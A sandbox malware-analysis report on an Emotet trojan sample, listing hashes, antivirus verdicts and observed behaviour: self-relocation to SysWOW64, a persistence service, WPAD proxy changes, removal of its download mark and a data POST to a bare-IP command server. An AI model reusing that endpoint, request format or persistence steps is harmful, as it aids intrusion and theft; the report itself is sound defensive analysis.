11.2
0-day

473f169d0a08913a2739689bdbda20eef86526cde7b351b4f8e59d03d56d3567

9fedeab0a32cb5adc62eceb2a847adb3.exe

Analysis time

149s

Latest analysis

File size

360.0KB
Static detections | Dynamic detections
鹰眼 (Eagle Eye) engine
Not detected: no 鹰眼 engine results are available for this sample
Static verdict
Antivirus engines
Engine | Result | Scan date | Engine version
McAfee Emotet-FQU!9FEDEAB0A32C 20201211 6.0.6.653
Alibaba Trojan:Win32/Emotet.bd1c86ca 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:BankerX-gen [Trj] 20201210 21.1.5827.0
Tencent Malware.Win32.Gencirc.10ba4397 20201211 1.0.0.1
Kingsoft Win32.Hack.Emotet.g.(kcloud) 20201211 2017.9.26.565
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Static indicators
Queries for the computer name (1 event)
Time & API Arguments Status Return Repeated
1619803089.267626
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 events)
Time & API Arguments Status Return Repeated
1619803077.533626
CryptGenKey
crypto_handle: 0x005ead80
algorithm_identifier: 0x0000660e ()
provider_handle: 0x005e9780
flags: 1
key: fHñÜâ­0~¤V˧¿»óˆ
success 1 0
1619803089.408626
CryptExportKey
crypto_handle: 0x005ead80
crypto_export_handle: 0x005eac28
buffer: f¤H«g¿'Ç» Øè+#Ɵ›Ê(GW_…Ù1˜ÝbØI¨É)üŠp¢r¸îÈ”Ä´̨ÏV!d²§ªçW‘¬ëÃ# ¤¡1Ð_-ÍΊoØ ƒM :¡I8S T
blob_type: 1
flags: 64
success 1 0
1619803115.626626
CryptExportKey
crypto_handle: 0x005ead80
crypto_export_handle: 0x005eac28
buffer: f¤ÇÓ×="ê€'éiƒ¶#ɳޑBEy~íåiw$Žà'~Iyn•ZònAlsx(d]ž(NdáÄH1Af¸EH)’4ýf…4½Å(#½q‰³`t,eùüHs§‰š
blob_type: 1
flags: 64
success 1 0
1619803119.111626
CryptExportKey
crypto_handle: 0x005ead80
crypto_export_handle: 0x005eac28
buffer: f¤^À\¤ÝA!‹bŽ&=sL¿½Ýt Š üþËďÎL®*ù¯¦<ÿãeº³ëïcOùòIJ•v”SŒX쎪.›:âàÿ¦¤Ìa{N!p9ð££Ü›ûÖ »
blob_type: 1
flags: 64
success 1 0
1619803129.095626
CryptExportKey
crypto_handle: 0x005ead80
crypto_export_handle: 0x005eac28
buffer: f¤f“›xh †MjZ4fX°ØD£ù€vN”Q@Bœ\R "ä´Ç<ERá[%r’¿Òh2§á·,áûñ€ž“âÎ2~C/w²` qµIsf(ïq¤ „èÀøtËtVrÔ
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 event)
packer Armadillo v1.71
Behavioural verdict
Dynamic indicators
HTTP traffic contains suspicious features which may be indicative of malware-related traffic (2 events)
suspicious_features: Connection to IP address; suspicious_request: POST http://37.70.131.107/2eK2w0Nm/
suspicious_features: POST method with no referer header; suspicious_request: POST https://update.googleapis.com/service/update2?cup2key=10:596596380&cup2hreq=0ce51e2064c48efe94981b41884a28ea8f70f1863d701b928bed5b58822eafbe
Performs some HTTP requests (7 events)
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619773938&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
request POST http://37.70.131.107/2eK2w0Nm/
request GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
request GET http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
request POST https://update.googleapis.com/service/update2?cup2key=10:596596380&cup2hreq=0ce51e2064c48efe94981b41884a28ea8f70f1863d701b928bed5b58822eafbe
Sends data using the HTTP POST method (2 events)
request POST http://37.70.131.107/2eK2w0Nm/
request POST https://update.googleapis.com/service/update2?cup2key=10:596596380&cup2hreq=0ce51e2064c48efe94981b41884a28ea8f70f1863d701b928bed5b58822eafbe
Allocates read-write-execute memory (usually to unpack itself) (3 events)
Time & API Arguments Status Return Repeated
1619781448.53175
NtAllocateVirtualMemory
process_identifier: 520
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02260000
success 0 0
1619802661.86552
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00000000041e0000
success 0 0
1619803057.205626
NtAllocateVirtualMemory
process_identifier: 2436
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00500000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Creates a shortcut to an executable file (1 event)
file C:\Users\Public\Desktop\Google Chrome.lnk
Searches running processes, potentially to identify processes for sandbox evasion, code injection or memory dumping (1 event)
Moves the original executable to a new location (1 event)
Time & API Arguments Status Return Repeated
1619781455.00075
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\9fedeab0a32cb5adc62eceb2a847adb3.exe
newfilepath: C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe
newfilepath_r: C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\9fedeab0a32cb5adc62eceb2a847adb3.exe
success 1 0
Checks adapter addresses, which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619803090.470626
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 event)
entropy: 7.10414778321143; section: {'size_of_data': '0x0000f000', 'virtual_address': '0x00050000', 'entropy': 7.10414778321143, 'name': '.rsrc', 'virtual_size': '0x0000ea30'}; description: A section with high entropy has been found
Expresses interest in specific running processes (1 event)
process hdwwiz.exe
Reads the system's User-Agent string and subsequently performs requests (1 event)
Time & API Arguments Status Return Repeated
1619803089.767626
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
Network communication
Communicates with hosts for which no DNS query was performed (7 events)
Installs itself for autorun at Windows startup (1 event)
service_name: hdwwiz; service_path: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe"
Created a service that was not subsequently started (1 event)
Time & API Arguments Status Return Repeated
1619781458.18775
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x0063a058
display_name: hdwwiz
error_control: 0
service_name: hdwwiz
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe"
filepath_r: "C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe"
service_manager_handle: 0x00639bd0
desired_access: 2
service_type: 16
password:
success 6529112 0
Sets or modifies the WPAD proxy auto-configuration file for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1619803093.048626
RegSetValueExA
key_handle: 0x000003c8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003c8
value: pÇÁÅò=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003c8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619803093.048626
RegSetValueExW
key_handle: 0x000003c8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003e0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003e0
value: pÇÁÅò=×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619803093.048626
RegSetValueExA
key_handle: 0x000003e0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619803093.080626
RegSetValueExW
key_handle: 0x000003c4
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of the file having been downloaded from the Internet (1 event)
file C:\Windows\SysWOW64\hdwwiz\hdwwiz.exe:Zone.Identifier
File has been identified by 54 antivirus engines on VirusTotal as malicious (showing 50 of 54 events)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.EmotetU.Gen.wq0@b0M@3HmO
FireEye Trojan.EmotetU.Gen.wq0@b0M@3HmO
Qihoo-360 Win32/Backdoor.902
McAfee Emotet-FQU!9FEDEAB0A32C
Cylance Unsafe
Zillya Trojan.Emotet.Win32.20446
SUPERAntiSpyware Trojan.Agent/Gen-Emotet
K7AntiVirus Trojan ( 005600261 )
Alibaba Trojan:Win32/Emotet.bd1c86ca
K7GW Trojan ( 005600261 )
Arcabit Trojan.EmotetU.Gen.EDC799
Cyren W32/Emotet.AKH.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Malware.Emotet-7773755-0
Kaspersky Backdoor.Win32.Emotet.gql
BitDefender Trojan.EmotetU.Gen.wq0@b0M@3HmO
Paloalto generic.ml
Tencent Malware.Win32.Gencirc.10ba4397
Ad-Aware Trojan.EmotetU.Gen.wq0@b0M@3HmO
TACHYON Backdoor/W32.Emotet.368640
Sophos Mal/Generic-R + Mal/EncPk-APM
Comodo Malware@#5d2q3gz0akml
F-Secure Trojan.TR/Crypt.Agent.yhync
DrWeb Trojan.DownLoader33.38818
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.EMOTET.SMTHC.hp
McAfee-GW-Edition BehavesLike.Win32.Emotet.fh
Emsisoft Trojan.Emotet (A)
Jiangmin Backdoor.Emotet.en
Webroot W32.Trojan.Trickbot
Avira TR/Crypt.Agent.yhync
Antiy-AVL Trojan/Win32.Emotet
Kingsoft Win32.Hack.Emotet.g.(kcloud)
Microsoft Trojan:Win32/Emotet.ARJ!MTB
AegisLab Trojan.Win32.Emotet.L!c
ZoneAlarm Backdoor.Win32.Emotet.gql
GData Trojan.EmotetU.Gen.wq0@b0M@3HmO
Cynet Malicious (score: 85)
AhnLab-V3 Malware/Win32.RL_Possible_smhpemotetth.R337613
ALYac Trojan.EmotetU.Gen.wq0@b0M@3HmO
VBA32 Backdoor.Emotet
Malwarebytes Trojan.Emotet
ESET-NOD32 a variant of Win32/Kryptik.HDZF
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.SMTHC.hp
Rising Trojan.Kryptik!1.C89F (CLASSIC)
Yandex Trojan.Kryptik!VgL6Snl00N4
Ikarus Trojan-Banker.Emotet
Connects to IP addresses that are no longer responding to requests (legitimate services usually remain up and running) (6 events)
Visual analysis
Binary image
No binary image: no binary visualisation image was generated for this sample
Runtime screenshots
No screenshots: no screenshots were captured while the sample ran


PE Compile Time

2020-05-04 17:36:55

Imports

Hosts

No hosts contacted.

TCP

Source | Source Port | Destination (IP, hostname where resolved) | Destination Port
192.168.56.101 49194 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49195 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49202 116.11.67.6 www.download.windowsupdate.com 80
192.168.56.101 49193 203.208.41.33 redirector.gvt1.com 80
192.168.56.101 49192 203.208.41.66 update.googleapis.com 443
192.168.56.101 49199 37.70.131.107 80
192.168.56.101 49201 37.70.131.107 443

UDP

Source | Source Port | Destination (IP, hostname where resolved) | Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53210 114.114.114.114 53
192.168.56.101 53500 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 55169 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 60088 114.114.114.114 53
192.168.56.101 60911 114.114.114.114 53
192.168.56.101 64214 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50433 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 54991 224.0.0.252 5355

HTTP & HTTPS Requests

URI | Request data
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 3600
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 03 Mar 2021 06:32:16 GMT
If-None-Match: "0d8f4f3f6fd71:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619773938&mv=m&mvi=1&pl=23&shardbypass=yes
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619773938&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com

http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=18109-32357
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=6841-18108
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

http://37.70.131.107/2eK2w0Nm/
POST /2eK2w0Nm/ HTTP/1.1
Referer: http://37.70.131.107/2eK2w0Nm/
Content-Type: multipart/form-data; boundary=---------------------------414466222086974
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 37.70.131.107
Content-Length: 4548
Connection: Keep-Alive
Cache-Control: no-cache

http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com

http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=32358-49540
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=0-6840
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.